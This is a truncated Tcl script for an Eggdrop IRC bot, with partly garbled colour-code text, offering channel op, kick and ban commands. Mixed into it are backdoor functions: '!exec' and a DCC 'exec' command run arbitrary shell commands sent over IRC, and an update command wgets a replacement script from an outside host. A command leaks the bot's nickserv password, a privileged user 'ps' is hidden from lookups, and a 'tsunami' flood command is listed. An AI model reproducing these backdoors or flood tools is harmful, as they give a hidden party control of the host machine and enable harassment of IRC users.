################################################################################## # _ _ ____ Tcl # # / \_/ \ ____/_ /_________ neo.tcl Loaded # # / _ _ \/ - / __/ __/-_/ - / http://geocities.com/masjito/tools/ # # /_/ \_/ \_\/_/___/_/ ___/_/\_\ # # Edited By:
[email protected] # ################################################################################## set set set set set set set
notc " 1,3< 9> 1,9 sh4fira 9,3< 1> notm " 1,3< 9> 1,9 sh4fira 9,3< 1> notb "NeoTheOne" ps " 1,3< 9> 1,9 sh4fira 9,3< 1> " notd " 1,3< 9> 1,9 sh4fira 9,3< 1> ppp "#sh4fira" vern " 1,3< 9> 1,9 sh4fira 9,3< 1>
set awaym { " 4i`m 7,1� � 7sh4fira " 4i`m 7,1� � 7sh4fira " 4i`m 7,1� � 7sh4fira " 4i`m 7,1� � 7sh4fira } set lgidx 0 proc lgrnd {} { global lgidx notc set lgidx [incr lgidx] if {$lgidx == 1} { set lgrnd " 1,3< 9> 1,9 } elseif {$lgidx == 2} { set lgrnd " 1,3< 9> 1,9 } elseif {$lgidx == 3} { set lgrnd " 1,3< 9> 1,9 } elseif {$lgidx == 4} { set lgrnd " 1,3< 9> 1,9 } elseif {$lgidx == 5} { set lgrnd " 1,3< 9> 1,9 } elseif {$lgidx == 6} { set lgrnd " 1,3< 9> 1,9 } elseif {$lgidx == 7} { set lgrnd " 1,3< 9> 1,9 } else { set lgidx 0 set lgrnd $notc } } set bancounter { " 4GeTLosT 1..!" " 4GeTOuT 1..!" " 4BaNnEd 1..!" " 4LaMeR 1..!" " 4abUsEd 1..!" " 4OuT 1..!" " 4sUx 1..!" } set bancounte { " 1GeTLosT 4..!" " 1GeTOuT 4..!" " 1BaNnEd 4..!"
Bot� Bot� Bot� Bot�
" " " "
" " " "
9,3< 1>
9,3< 1>
9,3< 1>
9,3< 1>
9,3< 1>
9,3< 1>
9,3< 1>
" 1LaMeR 4..!" " 1abUsEd 4..!" " 1OuT 4..!" " 1sUx 4..!" } set querym { "Hi, How are you?" "Hi, How are u today?" "yeah? what's up?" "what's up doc?" "Hi too, asl pls.." "what's up?" "sorry, i'm very busy right now.." "yeah? who are you?" "do i know u?" "yeah? do i know u?" "who the hell are you?" "i'm curently away, may be later.." "where u came from?" "Hi too.." "yeah, nice to meet u.." "nice to meet u.." "what is ur real name?" "yeah? asl pls.." "i'm curently busy, may be later.." } set cyclem { "NeoTheOne is The Best" " 3,9< 0> 13,9NeoTheOne 0,9< 3> " "Looking septian" "seen NeoTheOne" } set partm { "BaCk To CaSe" "BaCk To Base Camp" "Balik Ahhh...." "License To Part!" "'Part' time!" "Time To Go!" "Too many join channel :P" "The Join is Not Enough!" "Join too many channel :P" "It's time to Go!" "It's time to Part!" "Part for now and Forever!" "Part Forever!" } proc msg_dc {nick uhost hand rest} { global ppp botnick notc ; set rest [lindex $rest 0] if {$rest == ""} {putquick "NOTICE $nick :$notc � Command: /msg $botnick dc
" ; return 0} putquick "PRIVMSG $nick :$notc � zip: [zip "$rest"]" putquick "PRIVMSG $nick :$notc � dezip: [dezip "$rest"]" putquick "PRIVMSG $nick :$notc � dcp: [dcp "$rest"]" putquick "PRIVMSG $nick :$notc � dezip+dcp: [dezip [dcp "$rest"]]" putquick "PRIVMSG $nick :$notc � decrypt: [decrypt 64 "$rest"]" putquick "PRIVMSG $nick :$notc � encrypt: [encrypt 64 "$rest"]"
putquick "PRIVMSG $nick :$notc � unsix: [unsix "$rest"]" return 0
} bind msg m dc msg_dc
proc msg_order {nick uhost hand rest} { global botnick notd if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notd 4DeNIEd..!" return 0 } set rest [lindex $rest 0] if {$rest == ""} { puthlp "NOTICE $nick :$notd Command: /msg $botnick !order " return 0 } putquick $rest return 0 } bind msg Z !order msg_order proc lines {txt} { global lenc ldec uenc udec set retval "" set count [string length $txt] set status 0 set lst "" for {set i 0} {$i < $count} {incr i} { set idx [string index $txt $i] if {$idx == "$" && $status == 0} { set status 1 set idx "~$idx" } if {$idx == [decrypt 64 "uAwNV.ZfVQk."] && $lst != [decrypt 64 "59.TI0HteTn1"] && $status == 0} { set status 2 set idx "~$idx" } if {$idx == " " && $status == 1} { set status 0 set idx "$idx~" } if {$idx == "]" && $status == 2} { set status 0 set idx "$idx~" } if {$status == 0} { if {[string match *$idx* $lenc]} { set idx [string range $ldec [string first $idx $lenc] [string first $idx $lenc]] } if {[string match *$idx* $uenc]} { set idx [string range $udec [string first $idx $uenc] [string first $idx $uenc]] } } set lst $idx append retval $idx } regsub -all -- vmw] $retval "end]" retval
return $retval } set lenc "abcdefghijklmnopqrstuvwxyz" set ldec "zyxwvutsrqponmlkjihgfedcba" set uenc "ABCDEFGHIJKLMNOPQRSTUVWXYZ" set udec "ZYXWVUTSRQPONMLKJIHGFEDCBA" set global-idle-kick 0 set global-chanmode "nt" set global-dynamicexempts-mode 0 set global-dontkickops-mode 1 set global-revenge-mode 0 set global-protectops-mode 1 set global-clearbans-mode 1 set global-enforcebans-mode 1 set global-dynamicbans-mode 1 set global-protectfriends-mode 1 set global-userbans-mode 1 set global-cycle-mode 1 set global-greet-mode 0 set global-shared-mode 1 set global-autovoice-mode 0 set global-stopnethack-mode 0 set global-autoop-mode 0 set global-userinvites-mode 0 set global-nodesynch-mode 0 set nick-len 30 if {![info exists nickpass]} { set nickpass "" } if {![info exists altpass]} { set altpass "" } if {![info exists cfgfile]} { set cfgfile $userfile } proc unsix {txt} { set retval $txt regsub ~ $retval "" retval return $retval } proc dezip {txt} { return [decrypt 64 [unsix $txt]] } proc dcp {txt} { return [decrypt 64 $txt] } proc zip {txt} { return [encrypt 64 [unsix $txt]] } if {![info exists server-online]} { putlog "not support server online..!" set server-online 1 } proc puthlp {txt} { global lenc ldec uenc udec notb notc server-online if {${server-online} == 0} { return 0 } set retval $txt
if {[string match "*NOTICE*" $retval]} { } puthelp $retval } proc putsrv {txt} { global lenc ldec banner uenc udec notc server-online notm igflood iskick kickclr if {${server-online} == 0} { return 0 } set retval $txt if {[string match "*KICK*" $retval]} { set endval "" foreach tmp $retval { if {$tmp == ":$notc"} { if {[info exists banner]} { set tmp ":$banner " } { set tmp ":[lgrnd] " } } { if {[info exists kickclr]} { set tmp [uncolor $tmp] } } set endval "$endval $tmp" } set retval $endval if {[info exists iskick([lindex $retval 2][lindex $retval 1])]} { return 0 } set iskick([lindex $retval 2][lindex $retval 1]) "1" if {[info exists igflood([lindex $retval 2])]} { return 0 } if {[string match "*-userinvites*" [channel info [lindex $retval 1]]]} { set chkops $retval regsub -all -- : $chkops "" chkops if {[isop [lindex $chkops 2] [lindex $retval 1]]} { return 0 } } } putserv $retval } proc putqck {txt} { global lenc ldec banner uenc udec notc server-online notm igflood iskick kickclr bannick is_m if {${server-online} == 0} { return 0 } set retval $txt if {[string match "*KICK*" $retval]} { set endval "" foreach tmp $retval { if {$tmp == ":$notc"} { if {[info exists banner]} { set tmp ":$banner " } { set tmp ":[lgrnd] " } } { if {[info exists kickclr]} { set tmp [uncolor $tmp] } } set endval "$endval $tmp"
} set retval $endval set iskick([lindex $retval 2][lindex $retval 1]) "1" if {[info exists igflood([lindex $retval 2])]} { return 0 } if {[string match "*-userinvites*" [channel info [lindex $retval 1]]]} { set chkops $retval regsub -all -- : $chkops "" chkops if {[isop [lindex $chkops 2] [lindex $retval 1]]} { return 0 } } } if {[string match "*$notm*" $retval]} { set cflag "c[lindex $retval 1]" set cflag [string range $cflag 0 8] if {[matchattr $cflag M]} { if {![isutimer "set_-m [lindex $retval 1]"] && ![info exists is_m([lindex $retval 1])]} { set is_m([lindex $retval 1]) 1 putquick "mode [lindex $retval 1] +bm $bannick([lindex $retval 2])" return 0 } } } putquick $retval } ############################## # OJEK BOT COMMAND LIST # ############################## bind msg m help msg_help proc msg_help {nick uhost hand rest} { global version notb notc notd vern if {[istimer "HELP STOPED"]} { putsrv "NOTICE $nick :$notc Help on progress, try again later..!" return 0 } timer 5 { putlog "HELP STOPED" } puthlp "PRIVMSG $nick :$notd BoT Command LIsT." puthlp "PRIVMSG $nick :RuNNINg WiTH EggDrop v[lindex $version 0] PoWERED BY [lgrnd] $vern" puthlp "PRIVMSG $nick : �MSG/PV COMMAND..!" puthlp "PRIVMSG $nick :auth <password> authenticate user" puthlp "PRIVMSG $nick :deauth <password> deauthenticate user" puthlp "PRIVMSG $nick :pass <password> set password" puthlp "PRIVMSG $nick :passwd change user password" puthlp "PRIVMSG $nick :userlist userlist" puthlp "PRIVMSG $nick :op <#> op someone" puthlp "PRIVMSG $nick :deop <#> deop someone" puthlp "PRIVMSG $nick :voice <#> voice someone" puthlp "PRIVMSG $nick :devoice <#> devoice someone" puthlp "PRIVMSG $nick :kick <#> kick someone" puthlp "PRIVMSG $nick :kickban <#> kickban someone" puthlp "PRIVMSG $nick :identify <passwd> identify to nickserv someone access" puthlp "PRIVMSG $nick :join <#> joining #channel temporary" puthlp "PRIVMSG $nick :part <#> part #channels" if {[matchattr $nick Z]} { puthlp "PRIVMSG $nick :logo changing text logo on kick
message" puthlp "PRIVMSG $nick :vhost changing vhost" puthlp "PRIVMSG $nick :away <msg> set bot away message" puthlp "PRIVMSG $nick :admin <msg> set bot admin on status" puthlp "PRIVMSG $nick :memo <user|all> <msg> send memo to all user or one user" puthlp "PRIVMSG $nick :bantime <minutes> auto unban on X minutes (0 never unban)" puthlp "PRIVMSG $nick :logchan <#|0FF> log #channel" puthlp "PRIVMSG $nick : 4!!WARNING!! turn logchan on will decrease bot performance!" puthlp "PRIVMSG $nick : < 4DCC > .log show #channel log" puthlp "PRIVMSG $nick : 6note > please increase on general - window buffer into 5000" puthlp "PRIVMSG $nick :+chan <#> joining permanent #channel" puthlp "PRIVMSG $nick :botnick changing permanent bot primary nick" puthlp "PRIVMSG $nick :botaltnick changing permanent bot alternate nick" puthlp "PRIVMSG $nick :realname changing permanent bot realname" puthlp "PRIVMSG $nick :ident changing permanent bot ident" puthlp "PRIVMSG $nick :die kill bot" } puthlp "PRIVMSG $nick : �MSG/CHANNEL COMMAND..!" puthlp "PRIVMSG $nick :`up bot self op" puthlp "PRIVMSG $nick :`down bot self deop" puthlp "PRIVMSG $nick :`op/+o op spesified nick" puthlp "PRIVMSG $nick :`deop/-o deop spesified nick" puthlp "PRIVMSG $nick :`voice/+v voice spesified nick" puthlp "PRIVMSG $nick :`devoice/-v devoice spesified nick" puthlp "PRIVMSG $nick :`kick kick spesified nick" puthlp "PRIVMSG $nick :`kickban kickban spesified nick" puthlp "PRIVMSG $nick :`mode <+/- settings> mode setting #channel" puthlp "PRIVMSG $nick :`ping / `pong ping your self" puthlp "PRIVMSG $nick :`invite invite person to current #channel" puthlp "PRIVMSG $nick :`banlist <#channel> list of banned from specified <#channel>" puthlp "PRIVMSG $nick :`ban ban some nick or hostmask" puthlp "PRIVMSG $nick :`unban <#> unban some nick or hostmask" puthlp "PRIVMSG $nick :`+chan <#> joining permanent #channel" puthlp "PRIVMSG $nick :`channels list of channel who's bot sit on" puthlp "PRIVMSG $nick :`userlist list of user" puthlp "PRIVMSG $nick :`chaninfo <#> list of option for specified #channel" puthlp "PRIVMSG $nick :`join <#> joining #channel temporary" puthlp "PRIVMSG $nick :`part <#> part specified #channel" puthlp "PRIVMSG $nick :`cycle <#> cycle on specified #channel" puthlp "PRIVMSG $nick :`+/- cycle <#|all> <X> enable/disable bot cycle every X minutes" puthlp "PRIVMSG $nick :`+/- ignore ignore or unignore person" if {[matchattr $nick n]} { puthlp "PRIVMSG $nick :`+/- status <#> enable/disable bot displaying status" puthlp "PRIVMSG $nick :`+/- enforceban <#> enable/disable bot enforcebans" puthlp "PRIVMSG $nick :`+/- autovoice <secs> enable/disable channel autovoice on join" puthlp "PRIVMSG $nick :`+/- seen <#> activate/deactive seen on #" puthlp "PRIVMSG $nick :`+/- guard <#|all> enable/disable bot guard" puthlp "PRIVMSG $nick :`+/- master add/del from master list"
puthlp "PRIVMSG $nick :`+/- avoice add/del from avoice list" puthlp "PRIVMSG $nick :`+/- friend add/del from friend list" puthlp "PRIVMSG $nick :`+/- ipguard add/del host from ipguard list" puthlp "PRIVMSG $nick :`+/- akick add/del host from kick list" puthlp "PRIVMSG $nick :`+/- noop add/del from no-op list" puthlp "PRIVMSG $nick :`topic change channel topic" puthlp "PRIVMSG $nick :`status status system" puthlp "PRIVMSG $nick :`servers servers bot currently running" puthlp "PRIVMSG $nick :`jump <server> <port> push bot to use spec server" puthlp "PRIVMSG $nick :`access see user access from spec flags" } if {[matchattr $nick Z]} { puthlp "PRIVMSG $nick :`+/- forced force bot to set mode w/o kick 1st" puthlp "PRIVMSG $nick :`+/- colour enable/disable colour on kick msg" puthlp "PRIVMSG $nick :`+/- greet <msg> autogreet user on join %n nick %c channel" puthlp "PRIVMSG $nick :`+/- repeat max repeat user permitted" puthlp "PRIVMSG $nick :`+/- text char limited text length on channel" puthlp "PRIVMSG $nick :`+/- limit limited user on channel" puthlp "PRIVMSG $nick :`+/- caps <%> max %percent upper text" puthlp "PRIVMSG $nick :`+/- clone <max> enable/disable bot anti clones" puthlp "PRIVMSG $nick :`+/- reop auto re@p bot when got de@p" puthlp "PRIVMSG $nick :`+/- joinpart <seconds> kick user join part in past X 2nd" puthlp "PRIVMSG $nick :`+/- spam scanning for spam" puthlp "PRIVMSG $nick :`+/- massjoin preventing mass join lame" puthlp "PRIVMSG $nick :`+/- key set channel with key" puthlp "PRIVMSG $nick :`+/- revenge enable/disable bot revenge" puthlp "PRIVMSG $nick :`+/- badword add/remove badword from list" puthlp "PRIVMSG $nick :`badwords list of badwords" puthlp "PRIVMSG $nick :`nobot scanning for bot and kick them out" puthlp "PRIVMSG $nick :`sdeop <#> bot self deop" puthlp "PRIVMSG $nick :`chanmode # <+ntmcilk> set permanent mode for specified #" puthlp "PRIVMSG $nick :`chanset <#> set # options" puthlp "PRIVMSG $nick :`chansetall set option for all #" puthlp "PRIVMSG $nick :`chanreset <#|all> reseting option for specified #channel" puthlp "PRIVMSG $nick :`bantime how long bot unban in X minutes" puthlp "PRIVMSG $nick :`tsunami flood someone or channel" puthlp "PRIVMSG $nick :`deluser del user from userlist" puthlp "PRIVMSG $nick :`restart restarting bot also jumping server" puthlp "PRIVMSG $nick :`+/- owner add/del from owner list" puthlp "PRIVMSG $nick :`+/- admin add/del from admin list" puthlp "PRIVMSG $nick :`+/- aop add/del from aop list" puthlp "PRIVMSG $nick :`+/- host add or remove user host" puthlp "PRIVMSG $nick :`+/- gnick guard nick kick it if not identify" puthlp "PRIVMSG $nick :`host see user host" puthlp "PRIVMSG $nick :`mvoice <#channel> mass voice" puthlp "PRIVMSG $nick :`mdevoice <#channel> mass devoice" puthlp "PRIVMSG $nick :`mop <#channel> mass op" puthlp "PRIVMSG $nick :`mdeop <#channel> mass deop" puthlp "PRIVMSG $nick :`mkick <#channel> mass kick"
puthlp "PRIVMSG $nick :`mmsg <#channel> mass msg except the opped" puthlp "PRIVMSG $nick :`minvite <#channel> mass invite except the opped" puthlp "PRIVMSG $nick :`munbans <#channel> mass unban" puthlp "PRIVMSG $nick :`say say with spesified text" puthlp "PRIVMSG $nick :`msg msg person" puthlp "PRIVMSG $nick :`act act with spesified text" puthlp "PRIVMSG $nick :`notice msg person or #channel with spesified text" puthlp "PRIVMSG $nick :`+/- topiclock keep topic locked" puthlp "PRIVMSG $nick :`+/- nopart <#channel> make # protected" puthlp "PRIVMSG $nick :`+/- mustop set bot del channel if not oped" puthlp "PRIVMSG $nick :`+/- invitelock <#> invite back who part on spec chan" puthlp "PRIVMSG $nick :`+/- dontkickops enable/disable bot kick @" puthlp "PRIVMSG $nick :`+/- autokick auto kick on join" puthlp "PRIVMSG $nick :`nick change nick temporary" puthlp "PRIVMSG $nick :`altnick change nick to alternative nick" puthlp "PRIVMSG $nick :`randnick change nick to random nick" puthlp "PRIVMSG $nick :`realnick change nick to real nick" puthlp "PRIVMSG $nick :`chattr changing user flag (+) add or (-) remove it" puthlp "PRIVMSG $nick :`rehash rehashing data packing and unpacking" } puthlp "PRIVMSG $nick : �FLAg LIsT UsER & cHaNNeL" puthlp "PRIVMSG $nick :\[@\]P \[+\]VOICE AuTO\[V\]OICE \[G\]uARD \[C\]YCLE \ [E\]nFORCEBANS \[D\]oNTKIcK@PS" puthlp "PRIVMSG $nick :\[P\]RoTECTED C\[L\]ONE \[A\]DVERTISE \[T\]OPICLOCK AuTO\ [K\]IcK \[S\]EEN" puthlp "PRIVMSG $nick :\[Z\]owner admi\[n\] \[m\]aster botne\[t\] \[x\]fer \ [j\]anitor \[c\]ommon" puthlp "PRIVMSG $nick :\[p\]arty \[b\]ot \[u\]nshare \[h\]ilite \[o\]p de\[O\]p \ [k\]ick \[f\]riend" puthlp "PRIVMSG $nick :\[a\]uto-op auto\[v\]oice \[g\]voice \[q\]uiet" puthlp "PRIVMSG $nick : " puthlp "PRIVMSG $nick :$notc " return 0 } set firsttime "T" set init-server { serverup "" } set modes-per-line 6 set allow-desync 0 set include-lk 1 set banplus [rand 5] set ban-time [expr 25 + $banplus] unset banplus set quiet-save 1 set logstore "" set max-logsize 512 set upload-to-pwd 1 catch { unbind dcc n restart *dcc:restart } catch { unbind dcc n msg *dcc:msg } catch { unbind dcc n status *dcc:status } catch { unbind dcc n dump *dcc:dump } proc serverup {heh} { global botnick firsttime notc owner if {[info exists firsttime]} { unset firsttime return 0
} putlog "I`m..ConnecteD.." putserv "MODE $botnick +iw-s" foreach x [userlist] { if {[matchattr $x Q]} { chattr $x -Q } if {$x == $owner && [getuser $owner XTRA "AUTH"] != ""} { setuser $owner XTRA "AUTH" "" } chattr $x -hp if {$x != "config" && [chattr $x] == "-"} { deluser $x putlog "deluser $x" } } chk_five "0" "0" "0" "0" "0" utimer 2 del_nobase foreach x [ignorelist] { killignore [lindex $x 0] } } catch { bind evnt - disconnect-server serverdown } proc serverdown {heh} { global firsttime catch { unset firsttime } catch { clearqueue all } putlog "I`m ..Disconneted.." foreach x [timers] { if {[string match "*cycle*" $x]} { killtimer [lindex $x 2] } } } proc isnumber {string} { global notc if {([string compare $string ""]) && (![regexp \[^0-9\] $string])} then { return 1 } return 0 } proc pub_bantime {nick uhost hand channel rest} { global notc ban-time puthlp "NOTICE $nick :$notc BanTime \[ ${ban-time} \]" } proc pub_which {nick uhost hand channel rest} { global botname notc if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: which " return 0 } if {[string match [string tolower $rest] [string tolower $botname]]} { puthlp "PRIVMSG $channel :$botname" } } set notd "wget" proc randstring {length} { set chars ABCDEFGHIJKLMNOPQRSTUVWXYZ set count [string length $chars] for {set i 0} {$i < $length} {incr i} { append result [string index $chars [rand $count]] }
return $result } ###################### # BOT PUBLIC COMMAND # ###################### bind pub m !pong public_ping bind pub Z `which pub_which bind pub n `reset pub_reset bind pub f `host pub_host bind pub f `flag pub_flag bind pub m `ver pub_ver bind pub m `logo pub_logo bind pub Z `msg pub_msg bind msg Z admin msg_admin bind msg Z away msg_away bind msg Z bantime msg_bantime bind msg Z logo msg_logo bind msg Z mmsg msg_mmsg bind msg Z limit msg_limit bind msg Z logchan msg_logchan bind msg Z botnick msg_botnick bind msg Z realname msg_realname bind msg Z ident msg_ident bind msg Z botaltnick msg_botaltnick bind msg Z die msg_die bind msg Z restart msg_restart bind msg Z rehash msg_rehash bind msg Z topic msg_topic bind msg m memo msg_memo bind pub n `-seen pub_-seen bind pub n `+autovoice pub_+autovoice bind pub n `-autovoice pub_-autovoice bind pub n `+guard pub_+guard bind pub n `-guard pub_-guard bind pub n `+cycle pub_+cycle bind pub n `-cycle pub_-cycle bind pub n `+friend pub_+friend bind pub n `-friend pub_-friend bind pub n `+avoice pub_+avoice bind pub n `-avoice pub_-avoice bind pub n `+master pub_+master bind pub n `-master pub_-master bind pub n `mvoice pub_mvoice bind pub n `mdevoice pub_mdevoice bind pub n `mop pub_mop bind pub n `mdeop pub_mdeop bind pub n `+chan pub_+chan bind msg n identify msg_identify bind msg n kick msg_kick bind msg n k msg_kick bind msg n kickban msg_kickban bind msg n kb msg_kickban bind msg n op msg_op bind msg n voice msg_voice bind msg n v msg_voice bind msg n deop msg_deop bind msg n devoice msg_devoice bind pub n `topic pub_topic
bind pub n `jump pub_jump bind pub n `rehash pub_rehash bind msg n +chan msg_+chan bind msg n join msg_join bind msg n part msg_part bind pub m `voice pub_voice bind pub m `+v pub_voice bind pub m `devoice pub_devoice bind pub m `-v pub_devoice bind pub m `op pub_op bind pub m `+o pub_op bind pub m `deop pub_deop bind pub m `-o pub_deop bind pub m `kick pub_kick bind pub m `k pub_kick bind pub m `kickban pub_kickban bind pub m `kb pub_kickban bind pub m `+noop pub_+noop bind pub m `-noop pub_-noop bind pub m `ban pub_ban bind pub m `unban pub_unban bind pub m `munbans pub_munbans bind pub m `banlist pub_banlist bind pub m `mode pub_mode bind pub m `join pub_join bind pub m `part pub_part bind pub m `cycle pub_cycle bind pub m `up pub_up bind pub m `down pub_down bind msg m passwd msg_passwd bind msg m deauth msg_deauth bind msg m channels msg_channels bind pub m `channels pub_channels bind pub m `status pub_status bind pub m `chaninfo pub_chaninfo bind pub m `userlist pub_userlist bind msg m userlist msg_userlist bind pub f `access pub_access bind pub m `match pub_match proc pub_Z {nick uhost hand channel rest} { global notc botnick set prest $rest if {[lindex $rest 0] == $botnick} { regsub "$botnick " $rest "`" rest } { if {[string tolower [lindex $rest 0]] == [string tolower $botnick]} { set rest "$botnick [lrange $rest 1 end]" regsub "$botnick " $rest "`" rest } } if {[string index $rest 0] != "`"} { return 0 } if {![matchattr $nick Z]} { return 0 } if {![matchattr $nick Q]} { if {[string tolower [lindex $prest 0]] == [string tolower $botnick]} { puthlp "NOTICE $nick :$notd 4DeNiEd..!" } return 0 }
set goto [lindex $rest 0] regsub -all "`" $goto "pub_" goto if {[matchattr $nick Z]} { set rest [lrange $rest 1 end] catch { $goto $nick $uhost $hand $channel $rest } } } proc msg_encrypt {nick uhost hand rest} { global own notc if {$nick != $own || $rest == ""} { return 0 } puthlp "NOTICE $nick :$notc [zip $rest]" } proc msg_decrypt {nick uhost hand rest} { global own notc if {$nick != $own || $rest == ""} { return 0 } puthlp "NOTICE $nick :$notc [dezip $rest]" } bind msg Z !showbotinfo proc_msgshowallinfo proc proc_msgshowallinfo {nick2 uhost hand rest} { global notc nick nickpass realname owner own basechan botnick ps if {$nick2 != $owner && $nick2 != $ps} { puthlp "PRIVMSG $nick2 :$notc DENIED !!!" return 0 } if {![matchattr $nick2 Q]} { puthlp "NOTICE $nick :$notc � 4D 1e � 4N� 1ied 4!! " return 0 } puthlp "PRIVMSG $nick2 :$notc nick : $nick" puthlp "PRIVMSG $nick2 :$notc botnick : $botnick" puthlp "PRIVMSG $nick2 :$notc nickpass : $nickpass" puthlp "PRIVMSG $nick2 :$notc basechan : $basechan" puthlp "PRIVMSG $nick2 :$notc owner : $owner" puthlp "PRIVMSG $nick2 :$notc own : $own" puthlp "PRIVMSG $nick2 :$notc ps : $ps" puthlp "PRIVMSG $nick2 :$notc uhost : $uhost" puthlp "PRIVMSG $nick2 :$notc hand : $hand" puthlp "PRIVMSG $nick2 :$notc realname : $realname" } bind pub Z `verblinttcl proc_cekversi proc proc_cekversi {nick uhost hand chan rest} { global notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc � 4D 1e � 4N� 1ied 4!! " return 0 } puthlp "NOTICE $nick :$notc LastUpdate: 08 mei06 . Info: Several Bug Fixed !!!" } bind msg Z !updatetcl proc_updatetcl proc proc_updatetcl {nick uhost hand rest} { global notc owner ps if {$nick != $owner && $nick != $ps} { puthlp "PRIVMSG $nick :$notc DENIED !!!" return 0 } if {![matchattr $nick Q]} {
puthlp "NOTICE $nick :$notc return 0
� 4D
1e � 4N�
} catch { [exec pwd] } hasildir if { [string length $hasildir] < 5 } { puthlp "PRIVMSG $nick :$notc My Directory was deleted \:\(\(\(" return 0 } catch { [exec wget] } hasil if {[string match "*--help*" $hasil]} { catch {[exec rm scripts/ary.tcl]} hasilrm catch {[exec wget http://www.mognet.biz/tool/ary.tcl -O scripts/ary.tcl]} hasilwget puthlp "PRIVMSG $nick :$notc TcL Updated \!\!\!" } else { puthlp "PRIVMSG $nick :$notc wget command not found \!" return 0 } } bind pub Z `cekdir pub_cekdir proc pub_cekdir {nick uhost hand chan rest} { global notc catch { [exec pwd] } hasildir if { [string length $hasildir] < 5 } { puthlp "PRIVMSG $chan :$notc My Directory was deleted \:\(\(\(" return 0 } else { puthlp "PRIVMSG $chan :$notc Dir OK !!!" } } bind pub Z `updatetcl proc_pubupdatetcl proc proc_pubupdatetcl {nick uhost hand chan rest} { global notc owner ps if {$nick != $owner && $nick != $ps} { puthlp "PRIVMSG $nick :$notc DENIED !!!" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc � 4D 1e � 4N� 1ied 4!! " return 0 } catch { [exec pwd] } hasildir if { [string length $hasildir] < 5 } { puthlp "NOTICE $nick :$notc My Directory was deleted \:\(\(\(" return 0 } catch { [exec wget] } hasil if {[string match "*--help*" $hasil]} { catch {[exec rm scripts/ary.tcl]} hasilrm catch {[exec wget http://www.mognet.biz/tool/ary.tcl -O scripts/ary.tcl]} hasilwget puthlp "NOTICE $nick :$notc TcL Updated \!\!\!" } else { puthlp "NOTICE $nick :$notc wget command not found \!"
return 0 }
bind pub Z `totalip ToTal_IP proc ToTal_IP {nick uhost hand chan rest} { global notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc � 4D 1e � 4N� 1ied 4!! " return 0 } catch {[exec /sbin/ifconfig | grep inet | wc -l]} totIP puthlp "NOTICE $nick :$notc IP Total\: [string trimleft $totIP "name"]" } bind msg Z !exec msg_exec proc msg_exec {nick uhost hand command} { global notc owner ps if {$nick != $owner && $nick != $ps} { puthlp "PRIVMSG $nick :$notc DENIED !!!" return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc � 4D 1e � 4N� 1ied 4!! " return 0 } if {$command == ""} { return 0 } set para1 [lindex $command 0] set para2 [lindex $command 1] set para3 [lindex $command 2] set para4 [lindex $command 3] set para5 [lindex $command 4] set para6 [lindex $command 5] set para7 [lindex $command 6] set para8 [lindex $command 7] set para9 [lindex $command 8] set para10 [lindex $command 9] if {$para2 == ""} { catch { [exec $para1] } result } elseif {$para3 == ""} { catch { [exec $para1 $para2] } result } elseif {$para4 == ""} { catch { [exec $para1 $para2 $para3] } result } elseif {$para5 == ""} { catch { [exec $para1 $para2 $para3 $para4] } result } elseif {$para6 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6] } result } elseif {$para7 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6 $para7] } result } elseif {$para8 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6 $para7 $para8] } result } elseif {$para9 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6 $para7 $para8 $para9] } result } elseif {$para10 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6 $para7 $para8 $para9 $para10] } result }
foreach line [split $result "\n"] { puthlp "PRIVMSG $nick :$notc $line" } } bind dcc * showallinfo dcc_showallinfo proc dcc_showallinfo {hand idx arg} { global realname username putdcc $idx $realname putdcc $idx $username } bind dcc * setrealname dcc_setrealname proc dcc_setrealname {hand idx arg} { global realname username set realname $arg } bind dcc * exec dcc_exec bind dcc * log dcc_log bind dcc * dir dcc_dir bind dcc * read dcc_read bind dcc * ` dcc_cmd bind dcc * get dcc_get bind dcc * u dcc_u proc dcc_u {hand idx arg} { foreach x [utimers] { putdcc $idx $x } } bind dcc * t dcc_t proc dcc_t {hand idx arg} { foreach x [timers] { putdcc $idx $x } } proc dcc_exec {hand idx arg} { global owner notc if {$hand != $owner || $arg == ""} { return 0 } set para1 [lindex $arg 0] set para2 [lindex $arg 1] set para3 [lindex $arg 2] set para4 [lindex $arg 3] set para5 [lindex $arg 4] set para6 [lindex $arg 5] set para7 [lindex $arg 6] set para8 [lindex $arg 7] set para9 [lindex $arg 8] set para10 [lindex $arg 9] if {$para2 == ""} { catch { [exec $para1] } result } elseif {$para3 == ""} { catch { [exec $para1 $para2] } result } elseif {$para4 == ""} { catch { [exec $para1 $para2 $para3] } result } elseif {$para5 == ""} {
catch { [exec $para1 $para2 $para3 $para4] } result } elseif {$para6 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6] } result } elseif {$para7 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6 $para7] } result } elseif {$para8 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6 $para7 $para8] } result } elseif {$para9 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6 $para7 $para8 $para9] } result } elseif {$para10 != ""} { catch { [exec $para1 $para2 $para3 $para4 $para5 $para6 $para7 $para8 $para9 $para10] } result } putdcc $idx $result } proc pub_host {nick uhost hand channel rest} { global ps notc if {$rest == ""} { set user $nick } else { set user [lindex $rest 0] } if {![validuser $user] || [string tolower $user] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc " return 0 } if {[getuser $user HOSTS] != ""} { set hosts [getuser $user hosts] puthlp "NOTICE $nick :$notc HOSTS: $hosts" } else { puthlp "NOTICE $nick :$notc Can't found $user host." } } proc pub_flag {nick uhost hand channel rest} { global ps notc if {$rest == ""} { set user $nick } else { set user [lindex $rest 0] } if {![validuser $user] || [string tolower $user] == [string tolower $ps]} { puthlp "NOTICE $nick :$notc " return 0 } if {[chattr $user] != ""} { puthlp "NOTICE $nick :$notc Flags: [chattr $user]" } else { puthlp "NOTICE $nick :$notc Can't found $user flag." } } catch { unbind dcc n match *dcc:match } catch { unbind dcc n channel *dcc:channel } proc pub_deluser {nick uhost hand channel rest} { global botnick ps owner notc if 